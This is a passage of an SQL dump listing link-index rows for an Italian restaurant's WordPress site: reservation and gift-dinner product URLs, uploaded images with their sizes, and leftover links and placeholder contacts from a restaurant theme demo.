,323,'internal',759,26,NULL,NULL,NULL,NULL,NULL),(547,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',3047,323,'internal',759,26,NULL,NULL,NULL,NULL,NULL),(548,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasqua/',3047,324,'internal',759,171,NULL,NULL,NULL,NULL,NULL),(549,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasqua/',3047,324,'internal',759,171,NULL,NULL,NULL,NULL,NULL),(550,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasqua/',3047,324,'internal',759,171,NULL,NULL,NULL,NULL,NULL),(551,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-5-persone-pasqua/',3047,325,'internal',759,30,NULL,NULL,NULL,NULL,NULL),(552,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-5-persone-pasqua/',3047,325,'internal',759,30,NULL,NULL,NULL,NULL,NULL),(553,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-5-persone-pasqua/',3047,325,'internal',759,30,NULL,NULL,NULL,NULL,NULL),(554,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasquetta/',3047,327,'internal',759,17,NULL,NULL,NULL,NULL,NULL),(555,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasquetta/',3047,327,'internal',759,17,NULL,NULL,NULL,NULL,NULL),(556,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasquetta/',3047,328,'internal',759,18,NULL,NULL,NULL,NULL,NULL),(557,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasquetta/',3047,328,'internal',759,18,NULL,NULL,NULL,NULL,NULL),(558,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasquetta/',3047,328,'internal',759,18,NULL,NULL,NULL,NULL,NULL),(559,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasquetta/',3047,329,'internal',759,19,NULL,NULL,NULL,NULL,NULL),(560,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasquetta/',3047,329,'internal',759,19,NULL,NULL,NULL,NULL,NULL),(561,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-6-persone-pasquetta/',3047,331,'internal',759,20,NULL,NULL,NULL,NULL,NULL),(562,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-6-persone-pasquetta/',3047,331,'internal',759,20,NULL,NULL,NULL,NULL,NULL),(563,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasqua/',3047,333,'internal',759,28,NULL,NULL,NULL,NULL,NULL),(564,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasqua/',3047,333,'internal',759,28,NULL,NULL,NULL,NULL,NULL),(565,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasqua/',3047,333,'internal',759,28,NULL,NULL,NULL,NULL,NULL),(566,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-8-persone-pasquetta/',3047,334,'internal',759,22,NULL,NULL,NULL,NULL,NULL),(567,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-8-persone-pasquetta/',3047,334,'internal',759,22,NULL,NULL,NULL,NULL,NULL),(568,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-8-persone-pasquetta/',3047,334,'internal',759,22,NULL,NULL,NULL,NULL,NULL),(569,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasquetta/',3047,337,'internal',759,29,NULL,NULL,NULL,NULL,NULL),(570,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasquetta/',3047,337,'internal',759,29,NULL,NULL,NULL,NULL,NULL),(571,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasquetta/',3047,337,'internal',759,29,NULL,NULL,NULL,NULL,NULL),(572,'https://www.ristorantesolymar.it/prodotto/menu-creativo-2-persone/',3047,435,'internal',759,172,NULL,NULL,NULL,NULL,NULL),(573,'https://www.ristorantesolymar.it/prodotto/menu-creativo-2-persone/',3047,435,'internal',759,172,NULL,NULL,NULL,NULL,NULL),(574,'https://www.ristorantesolymar.it/prodotto/menu-creativo-2-persone/',3047,435,'internal',759,172,NULL,NULL,NULL,NULL,NULL),(575,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-creativo-per-2-persone-con-bevande/',3047,472,'internal',759,173,NULL,NULL,NULL,NULL,NULL),(576,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-creativo-per-2-persone-con-bevande/',3047,472,'internal',759,173,NULL,NULL,NULL,NULL,NULL),(577,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-creativo-per-2-persone-con-bevande/',3047,472,'internal',759,173,NULL,NULL,NULL,NULL,NULL),(578,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-storico-per-2-persone/',3047,474,'internal',759,174,NULL,NULL,NULL,NULL,NULL),(579,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-storico-per-2-persone/',3047,474,'internal',759,174,NULL,NULL,NULL,NULL,NULL),(580,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-storico-per-2-persone/',3047,474,'internal',759,174,NULL,NULL,NULL,NULL,NULL),(581,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(582,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(583,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(584,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(585,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(586,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(587,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(588,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(589,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(590,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(591,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(592,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',3047,212,'image-in',759,79,158,235,23961,NULL,NULL),(593,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',3047,470,'image-in',759,114,415,564,35563,NULL,NULL),(594,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',3047,470,'image-in',759,114,415,564,35563,NULL,NULL),(595,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',3047,470,'image-in',759,114,415,564,35563,NULL,NULL),(601,'tel:+445135340089',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(602,'tel:+4540183293763',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(603,'tel:+4543382748123',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(604,'mailto:info@attikarestaurant.ny',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(605,'https://www.instagram.com/attika.mikado/',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(606,'mailto:info@attika.ny',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(607,'mailto:info@attika.ny',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(608,'mailto:info@attika.ny',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(609,'mailto:info@attika.ny',3050,0,'external',762,NULL,NULL,NULL,NULL,NULL,NULL),(610,'#',3051,0,'internal',763,NULL,NULL,NULL,NULL,NULL,NULL),(611,'',3052,0,'image-in',764,NULL,NULL,NULL,NULL,NULL,NULL),(624,'',3057,0,'image-in',769,NULL,NULL,NULL,NULL,NULL,NULL),(625,'http://attika.mikado-themes.com/portfolio-item/seasoning-time/',3058,0,'external',770,NULL,NULL,NULL,NULL,NULL,NULL),(626,'http://attika.mikado-themes.com/portfolio-item/homemade-dining/',3058,0,'external',770,NULL,NULL,NULL,NULL,NULL,NULL),(627,'http://attika.mikado-themes.com/portfolio-item/italian-kiss/',3058,0,'external',770,NULL,NULL,NULL,NULL,NULL,NULL),(628,'mailto:work@attika.ny',3058,0,'external',770,NULL,NULL,NULL,NULL,NULL,NULL),(629,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-img-gallery-2-650x1300.jpg',3058,2224,'image-in',770,656,1300,1300,111309,NULL,NULL),(630,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-img-gallery-3.jpg',3058,2222,'image-in',770,650,1300,1300,106671,NULL,NULL),(631,'',3058,0,'image-in',770,NULL,NULL,NULL,NULL,NULL,NULL),(1244,'https://www.ristorantesolymar.it/acquista-cena/',3059,36,'internal',771,40,NULL,NULL,NULL,NULL,NULL),(1245,'https://www.ristorantesolymar.it/regala-cena/',3059,476,'internal',771,32,NULL,NULL,NULL,NULL,NULL),(653,'#',3072,0,'internal',784,NULL,NULL,NULL,NULL,NULL,NULL),(654,'#',3072,0,'internal',784,NULL,NULL,NULL,NULL,NULL,NULL),(655,'#',3072,0,'internal',784,NULL,NULL,NULL,NULL,NULL,NULL),(656,'#',3072,0,'internal',784,NULL,NULL,NULL,NULL,NULL,NULL),(657,'#',3072,0,'internal',784,NULL,NULL,NULL,NULL,NULL,NULL),(658,'#',3072,0,'internal',784,NULL,NULL,NULL,NULL,NULL,NULL),(659,'http://attika.mikado-themes.com/portfolio-item/h1-1/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(660,'http://attika.mikado-themes.com/portfolio-item/h1-2/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(661,'http://attika.mikado-themes.com/portfolio-item/h1-3/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(662,'http://attika.mikado-themes.com/portfolio-item/h1-4/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(663,'http://attika.mikado-themes.com/portfolio-item/h1-1/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(664,'http://attika.mikado-themes.com/portfolio-item/h1-2/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(665,'http://attika.mikado-themes.com/portfolio-item/h1-3/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(666,'http://attika.mikado-themes.com/portfolio-item/h1-4/',1650,0,'external',788,NULL,NULL,NULL,NULL,NULL,NULL),(667,'#',1658,0,'internal',789,NULL,NULL,NULL,NULL,NULL,NULL),(668,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/',1804,288,'internal',796,119,NULL,NULL,NULL,NULL,NULL),(669,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/',1804,288,'internal',796,119,NULL,NULL,NULL,NULL,NULL),(670,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/',1804,288,'internal',796,119,NULL,NULL,NULL,NULL,NULL),(671,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasqua/',1804,322,'internal',796,170,NULL,NULL,NULL,NULL,NULL),(672,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasqua/',1804,322,'internal',796,170,NULL,NULL,NULL,NULL,NULL),(673,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasqua/',1804,322,'internal',796,170,NULL,NULL,NULL,NULL,NULL),(674,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',1804,323,'internal',796,26,NULL,NULL,NULL,NULL,NULL),(675,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',1804,323,'internal',796,26,NULL,NULL,NULL,NULL,NULL),(676,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',1804,323,'internal',796,26,NULL,NULL,NULL,NULL,NULL),(677,'https://www.ristorantesolymar.it/prodotto/caparra/',1804,875,'internal',796,50,NULL,NULL,NULL,NULL,NULL),(678,'https://www.ristorantesolymar.it/prodotto/caparra/',1804,875,'internal',796,50,NULL,NULL,NULL,NULL,NULL),(679,'https://www.ristorantesolymar.it/prodotto/caparra/',1804,875,'internal',796,50,NULL,NULL,NULL,NULL,NULL),(680,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasquetta-2/',1804,633,'internal',796,21,NULL,NULL,NULL,NULL,NULL),(681,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-7-persone-pasquetta-2/',1804,633,'internal',796,21,NULL,NULL,NULL,NULL,NULL),(682,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-8-persone-pasqua/',1804,631,'internal',796,37,NULL,NULL,NULL,NULL,NULL),(683,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-8-persone-pasqua/',1804,631,'internal',796,37,NULL,NULL,NULL,NULL,NULL),(684,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-8-persone-pasqua/',1804,631,'internal',796,37,NULL,NULL,NULL,NULL,NULL),(685,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-6-persone-pasqua/',1804,630,'internal',796,176,NULL,NULL,NULL,NULL,NULL),(686,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-6-persone-pasqua/',1804,630,'internal',796,176,NULL,NULL,NULL,NULL,NULL),(687,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-6-persone-pasqua/',1804,630,'internal',796,176,NULL,NULL,NULL,NULL,NULL),(688,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/',1804,288,'internal',796,119,NULL,NULL,NULL,NULL,NULL),(689,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/',1804,288,'internal',796,119,NULL,NULL,NULL,NULL,NULL),(690,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/',1804,288,'internal',796,119,NULL,NULL,NULL,NULL,NULL),(691,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasqua/',1804,322,'internal',796,170,NULL,NULL,NULL,NULL,NULL),(692,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasqua/',1804,322,'internal',796,170,NULL,NULL,NULL,NULL,NULL),(693,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasqua/',1804,322,'internal',796,170,NULL,NULL,NULL,NULL,NULL),(694,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',1804,323,'internal',796,26,NULL,NULL,NULL,NULL,NULL),(695,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',1804,323,'internal',796,26,NULL,NULL,NULL,NULL,NULL),(696,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',1804,323,'internal',796,26,NULL,NULL,NULL,NULL,NULL),(697,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasqua/',1804,324,'internal',796,171,NULL,NULL,NULL,NULL,NULL),(698,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasqua/',1804,324,'internal',796,171,NULL,NULL,NULL,NULL,NULL),(699,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasqua/',1804,324,'internal',796,171,NULL,NULL,NULL,NULL,NULL),(700,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-5-persone-pasqua/',1804,325,'internal',796,30,NULL,NULL,NULL,NULL,NULL),(701,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-5-persone-pasqua/',1804,325,'internal',796,30,NULL,NULL,NULL,NULL,NULL),(702,'https://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-5-persone-pasqua/',1804,325,'internal',796,30,NULL,NULL,NULL,NULL,NULL),(703,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(704,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(705,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(706,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(707,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(708,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(709,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(710,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(711,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(712,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(713,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(714,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',1804,212,'image-in',796,79,158,235,23961,NULL,NULL),(715,'https://vimeo.com/183648707',2019,0,'external',807,NULL,NULL,NULL,NULL,NULL,NULL),(716,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-4.jpg',2019,2020,'image-in',807,604,1100,1708,112673,NULL,NULL),(717,'javascript:void(0)',2472,0,'external',815,NULL,NULL,NULL,NULL,NULL,NULL),(718,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-13.jpg',2472,2135,'image-in',815,622,43,1,1464,NULL,NULL),(719,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-member-img-2.jpg',2477,2488,'image-in',816,639,345,345,51373,NULL,NULL),(720,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-member-img-3.jpg',2477,2489,'image-in',816,645,345,345,48651,NULL,NULL),(721,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-member-img-1.jpg',2477,2487,'image-in',816,634,345,345,40656,NULL,NULL),(722,'javascript:void(0)',2494,0,'external',817,NULL,NULL,NULL,NULL,NULL,NULL),(723,'http://attika.mikado-themes.com',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(724,'http://attika.mikado-themes.com/restaurant-home/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(725,'http://attika.mikado-themes.com/fine-dining',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(726,'http://attika.mikado-themes.com/dish-showcase',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(727,'http://attika.mikado-themes.com/fullscreen-showcase',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(728,'http://attika.mikado-themes.com/seafood-restaurant',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(729,'http://attika.mikado-themes.com/restaurant-menu',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(730,'http://attika.mikado-themes.com/columns-carousel',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(731,'http://attika.mikado-themes.com/accolades/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(732,'http://attika.mikado-themes.com/visit-us/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(733,'http://attika.mikado-themes.com/restaurant-menu-left/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(734,'http://attika.mikado-themes.com/chef-bio/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(735,'http://attika.mikado-themes.com/contact-us/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(736,'http://attika.mikado-themes.com/our-kitchen/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(737,'http://attika.mikado-themes.com/restaurant-history/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(738,'http://attika.mikado-themes.com/opening-hours/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(739,'http://attika.mikado-themes.com/restaurant-menu-right/',2542,0,'external',818,NULL,NULL,NULL,NULL,NULL,NULL),(740,'#',2542,0,'internal',818,NULL,NULL,NULL,NULL,NULL,NULL),(741,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-1-1.jpg',2542,2946,'image-in',818,684,451,800,79764,NULL,NULL),(742,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-2-1.jpg',2542,2978,'image-in',818,694,451,800,103845,NULL,NULL),(743,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-4-1.jpg',2542,2948,'image-in',818,689,451,800,120715,NULL,NULL),(744,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-6.jpg',2542,2764,'image-in',818,662,451,800,80673,NULL,NULL),(745,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-7.jpg',2542,2765,'image-in',818,667,451,800,90234,NULL,NULL),(746,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-3.jpg',2542,2761,'image-in',818,657,451,800,107048,NULL,NULL),(747,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-5-1.jpg',2542,2949,'image-in',818,675,451,800,102946,NULL,NULL),(748,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-8.jpg',2542,2766,'image-in',818,673,451,800,99879,NULL,NULL),(749,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-18.jpg',2542,2779,'image-in',818,672,451,800,68710,NULL,NULL),(750,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-15.jpg',2542,2776,'image-in',818,651,451,800,79060,NULL,NULL),(751,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-17.jpg',2542,2778,'image-in',818,663,451,800,98511,NULL,NULL),(752,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-11.jpg',2542,2772,'image-in',818,620,451,800,74488,NULL,NULL),(753,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-14.jpg',2542,2775,'image-in',818,643,451,800,49881,NULL,NULL),(754,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-13.jpg',2542,2774,'image-in',818,633,451,800,85326,NULL,NULL),(755,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-12.jpg',2542,2773,'image-in',818,626,451,800,92371,NULL,NULL),(756,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-10.jpg',2542,2771,'image-in',818,690,451,800,48846,NULL,NULL),(757,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-16.jpg',2542,2777,'image-in',818,659,451,800,105217,NULL,NULL),(758,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-pop-up-bottom-sheet.png',2542,2620,'image-in',818,680,360,411,79307,NULL,NULL),(759,'https://www.ristorantesolymar.it/portfolio-item/ice-dream/',2843,3091,'internal',841,840,NULL,NULL,NULL,NULL,NULL),(760,'https://www.ristorantesolymar.it/portfolio-item/ice-dream/',2843,3091,'internal',841,840,NULL,NULL,NULL,NULL,NULL),(761,'https://www.ristorantesolymar.it/portfolio-item/green-magic/',2843,3090,'internal',841,839,NULL,NULL,NULL,NULL,NULL),(762,'https://www.ristorantesolymar.it/portfolio-item/green-magic/',2843,3090,'internal',841,839,NULL,NULL,NULL,NULL,NULL),(763,'https://www.ristorantesolymar.it/portfolio-item/tuna-salad/',2843,3088,'internal',841,837,NULL,NULL,NULL,NULL,NULL),(764,'https://www.ristorantesolymar.it/portfolio-item/tuna-salad/',2843,3088,'internal',841,837,NULL,NULL,NULL,NULL,NULL),(765,'https://www.ristorantesolymar.it/portfolio-item/red-dream/',2843,3089,'internal',841,838,NULL,NULL,NULL,NULL,NULL),(766,'https://www.ristorantesolymar.it/portfolio-item/red-dream/',2843,3089,'internal',841,838,NULL,NULL,NULL,NULL,NULL),(767,'https://www.ristorantesolymar.it/portfolio-item/season-to-taste/',2843,3087,'internal',841,836,NULL,NULL,NULL,NULL,NULL),(768,'https://www.ristorantesolymar.it/portfolio-item/season-to-taste/',2843,3087,'internal',841,836,NULL,NULL,NULL,NULL,NULL),(769,'https://www.ristorantesolymar.it/portfolio-item/peach-sorbet/',2843,3086,'internal',841,835,NULL,NULL,NULL,NULL,NULL),(770,'https://www.ristorantesolymar.it/portfolio-item/peach-sorbet/',2843,3086,'internal',841,835,NULL,NULL,NULL,NULL,NULL),(771,'https://www.ristorantesolymar.it/portfolio-item/the-fresh-pate/',2843,3085,'internal',841,834,NULL,NULL,NULL,NULL,NULL),(772,'https://www.ristorantesolymar.it/portfolio-item/the-fresh-pate/',2843,3085,'internal',841,834,NULL,NULL,NULL,NULL,NULL),(773,'https://www.ristorantesolymar.it/portfolio-item/green-soup/',2843,3084,'internal',841,833,NULL,NULL,NULL,NULL,NULL),(774,'https://www.ristorantesolymar.it/portfolio-item/green-soup/',2843,3084,'internal',841,833,NULL,NULL,NULL,NULL,NULL),(775,'https://www.ristorantesolymar.it/portfolio-item/cold-raspberry/',2843,618,'internal',841,832,NULL,NULL,NULL,NULL,NULL),(776,'https://www.ristorantesolymar.it/portfolio-item/cold-raspberry/',2843,618,'internal',841,832,NULL,NULL,NULL,NULL,NULL),(777,'https://www.ristorantesolymar.it/portfolio-item/grilled-vegetables/',2843,3083,'internal',841,831,NULL,NULL,NULL,NULL,NULL),(778,'https://www.ristorantesolymar.it/portfolio-item/grilled-vegetables/',2843,3083,'internal',841,831,NULL,NULL,NULL,NULL,NULL),(1150,'https://www.ristorantesolymar.it/mio-account/',3700,210,'internal',1523,51,NULL,NULL,NULL,NULL,NULL),(1151,'https://www.ristorantesolymar.it/mio-account/',3701,210,'internal',1524,51,NULL,NULL,NULL,NULL,NULL),(919,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/accolades-content-img.jpg',3054,703,'image-in',766,465,224,383,57848,NULL,NULL),(920,'',3054,0,'image-in',766,NULL,NULL,NULL,NULL,NULL,NULL),(921,'',3054,0,'image-in',766,NULL,NULL,NULL,NULL,NULL,NULL),(922,'tel:+445135340089',3049,0,'external',761,NULL,NULL,NULL,NULL,NULL,NULL),(923,'',3049,0,'internal',761,NULL,NULL,NULL,NULL,NULL,NULL),(924,'',3049,0,'internal',761,NULL,NULL,NULL,NULL,NULL,NULL),(925,'mailto:info@attikarestaurant.ny',3049,0,'external',761,NULL,NULL,NULL,NULL,NULL,NULL),(926,'mailto:info@attika.ny',3049,0,'external',761,NULL,NULL,NULL,NULL,NULL,NULL),(927,'#',3056,0,'internal',768,NULL,NULL,NULL,NULL,NULL,NULL),(928,'https://www.ristorantesolymar.it/portfolio-item/chocolate-sphere/',3056,3092,'internal',768,843,NULL,NULL,NULL,NULL,NULL),(929,'https://www.ristorantesolymar.it/portfolio-item/chocolate-sphere/',3056,3092,'internal',768,843,NULL,NULL,NULL,NULL,NULL),(930,'https://www.ristorantesolymar.it/portfolio-item/strawberry-sauce/',3056,3093,'internal',768,844,NULL,NULL,NULL,NULL,NULL),(931,'https://www.ristorantesolymar.it/portfolio-item/strawberry-sauce/',3056,3093,'internal',768,844,NULL,NULL,NULL,NULL,NULL),(932,'https://www.ristorantesolymar.it/portfolio-item/spanish-kiss/',3056,3094,'internal',768,845,NULL,NULL,NULL,NULL,NULL),(933,'https://www.ristorantesolymar.it/portfolio-item/spanish-kiss/',3056,3094,'internal',768,845,NULL,NULL,NULL,NULL,NULL),(934,'#',3056,0,'internal',768,NULL,NULL,NULL,NULL,NULL,NULL),(935,'https://vimeo.com/183648707',3056,0,'external',768,NULL,NULL,NULL,NULL,NULL,NULL),(936,'#',3056,0,'internal',768,NULL,NULL,NULL,NULL,NULL,NULL),(937,'mailto:info@attika.ny',3056,0,'external',768,NULL,NULL,NULL,NULL,NULL,NULL),(938,'mailto:press@attika.ny',3056,0,'external',768,NULL,NULL,NULL,NULL,NULL,NULL),(939,'mailto:work@attika.ny',3056,0,'external',768,NULL,NULL,NULL,NU